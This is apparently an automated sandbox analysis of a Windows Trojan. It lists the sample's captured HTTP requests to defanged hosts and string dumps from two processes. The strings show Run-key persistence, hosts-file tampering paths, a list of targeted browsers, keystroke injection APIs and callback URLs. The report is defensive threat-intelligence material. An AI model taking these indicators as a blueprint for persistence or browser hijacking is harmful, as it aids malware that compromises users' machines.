Last-Modified: Wed, 18 Jan 2017 22:23:23 GMT
Expires: Sun, 22 Jan 2017 22:23:23 GMT
ETag: "2e9ad832313d6be8aa684e9216f27afcf7f1b502"
Cache-Control: max-age=10800,public,no-transform,must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c0ba4004056-SOF
<<< skipped >>>
Cache-Control: max-age = 10800
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 18 Jan 2017 22:23:23 GMT
If-None-Match: "2e9ad832313d6be8aa684e9216f27afcf7f1b502"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.globalsign.com
HTTP/1.1 304 Not Modified
Date: Thu, 19 Jan 2017 00:40:22 GMT
Connection: keep-alive
Set-Cookie: __cfduid=d2e82d71249719d20589d01ed4e4b9b3c1484786422; expires=Fri, 19-Jan-18 00:40:22 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 22:23:23 GMT
Expires: Sun, 22 Jan 2017 22:23:23 GMT
ETag: "2e9ad832313d6be8aa684e9216f27afcf7f1b502"
Cache-Control: max-age=10800,public,no-transform,must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c2325894056-SOFHTTP/1.1 304 Not Modified..Date: Thu, 19 Jan 2017 00:40:22 GMT..Connection: keep-alive..Set-Cookie: __cfduid=d2e82d71249719d20589d01ed4e4b9b3c1484786422; expires=Fri, 19-Jan-18 00:40:22 GMT; path=/; domain=.globalsign.com; HttpOnly..Last-Modified: Wed, 18 Jan 2017 22:23:23 GMT..Expires: Sun, 22 Jan 2017 22:23:23 GMT..ETag: "2e9ad832313d6be8aa684e9216f27afcf7f1b502"..Cache-Control: max-age=10800,public,no-transform,must-revalidate..CF-Cache-Status: HIT..Server: cloudflare-nginx..CF-RAY: 32363c2325894056-SOF..
GET /images/new.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 3803
Content-Type: application/x-javascript
Last-Modified: Tue, 28 Jul 2015 08:19:44 GMT
Accept-Ranges: bytes
ETag: "0d08028ec9d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 1166
Content-Type: image/jpeg
Last-Modified: Wed, 01 Jul 2015 07:57:44 GMT
Accept-Ranges: bytes
ETag: "08c919cd3b3d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
GET /logo.jpg HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.92117my.com/index1.htm
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 30031
Content-Type: image/jpeg
Last-Modified: Fri, 06 Jan 2017 05:34:02 GMT
Accept-Ranges: bytes
ETag: "fefcb7cde67d21:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: VVV.92117my.com
Connection: Keep-Alive
Cookie: CNZZDATA1255675994=993092947-1484785024-null|1484785024
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
GET /host.html HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 5219
Content-Type: text/html
Last-Modified: Fri, 13 Jan 2017 12:48:11 GMT
Accept-Ranges: bytes
ETag: "9ebc6c4c9b6dd21:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
GET /?business&un=5182235367&from=prin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: passport.baidu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: keep-alive
Content-Type: text/html
Date: Thu, 19 Jan 2017 00:40:02 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: Apache
Set-Cookie: BAIDUID=BB091D280D8BB9A4DA1BF274DD690B70:FG=1; expires=Fri, 19-Jan-18 00:40:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Tracecode: 24029743220283886346011908
Tracecode: 24029743220703316746011908
Vary: Accept-Encoding
Vary: Accept-Encoding
<<< skipped >>>
GET /images/xx.css HTTP/1.1
Accept: text/css
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 3604
Content-Type: text/css
Last-Modified: Wed, 01 Jul 2015 07:57:44 GMT
Accept-Ranges: bytes
ETag: "08c919cd3b3d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 17599
Content-Type: image/jpeg
Last-Modified: Wed, 01 Jul 2015 07:57:44 GMT
Accept-Ranges: bytes
ETag: "08c919cd3b3d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
<<< skipped >>>
GET /jc/hostjc.txt?WebShieldDRSessionVerify=EMGc17Wrs9kjNC7K8XBq HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Safedog/4.0.0
Location: /jc/hostjc.txt
Content-Length: 0
Connection: Close
Content-Type: text/html
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
svchost.exe_1652:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
kernel32.dll
kernel32.dll
user32.dll
user32.dll
Kernel32.dll
Kernel32.dll
ws2_32.dll
ws2_32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xfjct
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xfjct
hXXp://ip.qq.com/
hXXp://ip.qq.com/
@Windows 2000
@Windows 2000
@Windows Server 2003
@Windows Server 2003
@Windows Vista
@Windows Vista
@Windows 7
@Windows 7
@Windows 8
@Windows 8
00-00-00-00-00-00
00-00-00-00-00-00
%System%\host.txt
%System%\host.txt
%System%\drivers\etc\hosts
%System%\drivers\etc\hosts
hXXp://passport.baidu.com/?business&un=5182235367&from=prin#0
hXXp://passport.baidu.com/?business&un=5182235367&from=prin#0
340046815
340046815
hXXp://VVV.gxnkw.com/jc/tongji.txt
hXXp://VVV.gxnkw.com/jc/tongji.txt
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
RASAPI32.dll
RASAPI32.dll
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
COMCTL32.dll
COMCTL32.dll
WSOCK32.dll
WSOCK32.dll
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
icmp.dll
icmp.dll
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
X-X-X-X-X-X
X-X-X-X-X-X
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
C:\Windows\svchost.exe
C:\Windows\svchost.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
A.AQAtA
A.AQAtA
(*.*)
(*.*)
1.0.0.0
1.0.0.0
svchosl.exe_3732:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
kernel32.dll
kernel32.dll
user32.dll
user32.dll
OLEACC.DLL
OLEACC.DLL
Kernel32.dll
Kernel32.dll
ws2_32.dll
ws2_32.dll
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
WebBrowser
WebBrowser
%System%\gjzbjclb.txt
%System%\gjzbjclb.txt
%System%\gjzjclb.txt
%System%\gjzjclb.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xff
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xff
hXXp://
hXXp://
hXXp://passport.baidu.com/?business&un=5182235367&from=prin#0
hXXp://passport.baidu.com/?business&un=5182235367&from=prin#0
340046815
340046815
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xf1
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xf1
hXXp://ip.qq.com/
hXXp://ip.qq.com/
@Windows 2000
@Windows 2000
@Windows Server 2003
@Windows Server 2003
@Windows Vista
@Windows Vista
@Windows 7
@Windows 7
@Windows 8
@Windows 8
00-00-00-00-00-00
00-00-00-00-00-00
Chrome_WidgetWin_100
Chrome_WidgetWin_100
liebao.exe
liebao.exe
maxthon.exe
maxthon.exe
360se.exe
360se.exe
2345Explorer.exe
2345Explorer.exe
MozillaWindowClass
MozillaWindowClass
firefox.exe
firefox.exe
hao123Juzi.exe
hao123Juzi.exe
SogouExplorer.exe
SogouExplorer.exe
QQBrowser.exe
QQBrowser.exe
Chrome_WidgetWin_1
Chrome_WidgetWin_1
opera.exe
opera.exe
TaoBrowser.exe
TaoBrowser.exe
TangoWeb.exe
TangoWeb.exe
TheWorld.exe
TheWorld.exe
UCBrowser.exe
UCBrowser.exe
{7597C4B1-F62C-4e83-A35F-8B69C8779DC1}
{7597C4B1-F62C-4e83-A35F-8B69C8779DC1}
baidubrowser.exe
baidubrowser.exe
360chrome.exe
360chrome.exe
TTraveler.exe
TTraveler.exe
chrome.exe
chrome.exe
vary.exe
vary.exe
Chrome_OmniboxView
Chrome_OmniboxView
f1browser.exe
f1browser.exe
went.exe
went.exe
miniie.exe
miniie.exe
Windows Internet Explorer_Frame
Windows Internet Explorer_Frame
cpopmus32ex.exe
cpopmus32ex.exe
crowd.exe
crowd.exe
slowt32ex.exe
slowt32ex.exe
Maxthon3Cls_MainFrmMsg
Maxthon3Cls_MainFrmMsg
SmartUI.Win32.Edit
SmartUI.Win32.Edit
TT_WebCtrl
TT_WebCtrl
wscript.shell
wscript.shell
SendKeys
SendKeys
hXXp://VVV.gxnkw.com/jc/tongji.txt
hXXp://VVV.gxnkw.com/jc/tongji.txt
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
ole32.dll
ole32.dll
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
RASAPI32.dll
RASAPI32.dll
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
GetKeyboardLayout
GetKeyboardLayout
VkKeyScanExA
VkKeyScanExA
keybd_event
keybd_event
USER32.dll
USER32.dll
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
OLEAUT32.dll
OLEAUT32.dll
COMCTL32.dll
COMCTL32.dll
oledlg.dll
oledlg.dll
WSOCK32.dll
WSOCK32.dll
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
X-X-X-X-X-X
X-X-X-X-X-X
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
.PAVCOleException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
